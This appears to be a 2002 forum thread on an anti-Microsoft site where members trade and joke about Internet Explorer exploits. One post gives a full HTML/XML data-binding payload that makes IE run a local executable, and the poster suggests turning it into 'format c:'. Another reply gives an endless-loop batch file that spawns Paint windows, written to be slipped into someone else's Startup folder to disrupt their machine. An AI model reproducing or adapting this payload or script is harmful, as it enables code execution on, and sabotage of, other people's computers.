Stop Microsoft

All Things Microsoft => Microsoft Software => Topic started by: CommonSense on 6 March 2002, 07:02

Title: Fun little IE exploit.
Post by: CommonSense on 6 March 2002, 07:02
Check this one out.

http://www.liquidwd.freeserve.co.uk/ (http://www.liquidwd.freeserve.co.uk/)

It opens a new command prompt window.  I don't know if this is old news or what, and I was too lazy to go upstairs to the one token Windows box to see it work (I'm an OS X user, after all).  Looks like there's great potential for trouble with a little creative tweaking of the source of this page . . .
Title: Fun little IE exploit.
Post by: voidmain on 6 March 2002, 07:44
Yes, I was aware of that one for a month or two now, and apparently it's been a problem for a very long time, but just recently made public.  Yep, wouldn't take much to wipe out a hard drive just by browsing to the wrong site...
Title: Fun little IE exploit.
Post by: Bateluer on 6 March 2002, 08:27
Lucky I don't use IE unless I am forced to   (http://smile.gif)

edit - It does not open the cmd.exe in Opera 6.01  :D

[ March 05, 2002: Message edited by: Bateleur ]

Title: Fun little IE exploit.
Post by: voidmain on 6 March 2002, 08:48
Holy Shit!  I clicked that link on my RedHat box and it fired up a copy of VMware running Windows 2000, then opened up a command prompt.  After it did that it opened up kdevelop and finished that KDE application for me that I've been working on.
Title: Fun little IE exploit.
Post by: Bateluer on 6 March 2002, 21:28
lol!
Title: Fun little IE exploit.
Post by: jtpenrod on 6 March 2002, 10:38
Or how about this one fromThe Register (http://www.theregister.co.uk/content/55/24274.html)

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
    <security>
        <exploit>
            <![CDATA[
            <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>
            ]]>
        </exploit>
    </security>
</xml>

Just copy that into any text editor, save as a *.html file and open it with IE. According to the article, this will launch the calculator program. Macro$uck doesn't have a patch for this (so what else did you expect?   :eek:  ) There is a way to get around this, but the cure sounds almost as bad as the disease. I don't suppose it would be too much trouble to get that to do, let's say, format c:  ;)  ?

Yet another Stupid Windows Trick from the Trustworthy Computing Co.  :D    :D    :D    :D
Title: Fun little IE exploit.
Post by: Druid on 7 March 2002, 00:38
Doesn't work for me.
Win2k, IE6

The path "c:/windows/ system32/calc.exe" is valid, btw

Druid
Title: Fun little IE exploit.
Post by: voidmain on 7 March 2002, 21:27
Druid, do you think you can get your money back?  Sounds like your copy of Windows isn't working properly.   (http://smile.gif)

[ March 07, 2002: Message edited by: VoidMain ]

Title: Fun little IE exploit.
Post by: tallwookie2 on 7 March 2002, 10:18
hmm... running win 98 se... that "command line" easter egg or whatever didnt do a damned thing... luv the site btw!

-tallwookie2
Title: Fun little IE exploit.
Post by: phill on 9 March 2002, 15:31
Win2K, IE6, don't do anything here  :confused:    :D
Title: Fun little IE exploit.
Post by: dirtydog on 9 March 2002, 20:19
Not a thing here ! Win 98 SE    :D
Title: Fun little IE exploit.
Post by: Bateluer on 10 March 2002, 10:53
How would you write a script to open say 5000 instances of Paint? I want to piss off some MS-Man whores  (http://tongue.gif)
Title: Fun little IE exploit.
Post by: voidmain on 10 March 2002, 12:03
Create a batch file called m$paint.bat and add it to his Startup folder with the following:

@echo off
:hell
echo Microsoft $ucks!!
start pbrush
goto hell

[ March 10, 2002: Message edited by: VoidMain ]

Title: Fun little IE exploit.
Post by: Bateluer on 10 March 2002, 20:19
I don't have physical access to their machines  (http://tongue.gif)
Title: Fun little IE exploit.
Post by: Druid on 11 March 2002, 00:58
Quote
Originally posted by VoidMain:
[QB]Druid, do you think you can get your money back?  Sounds like your copy of Windows isn't working properly.    (http://smile.gif)  

Of course it isn't working properly, that's how it was designed (http://smile.gif)

Druid
Title: Fun little IE exploit.
Post by: Doc Holliday on 13 March 2002, 12:37
jtpenrod

That bit of code you give is the XMLid.Exploit virus

FACT.
Title: Fun little IE exploit.
Post by: mikee_g_trikz on 18 March 2002, 14:34
I read the message about IE launching the calculator.exe but does anyone know how to launch a program from the Program Files folder ???
For example Word or Photoshop ???

Thanks

Mikee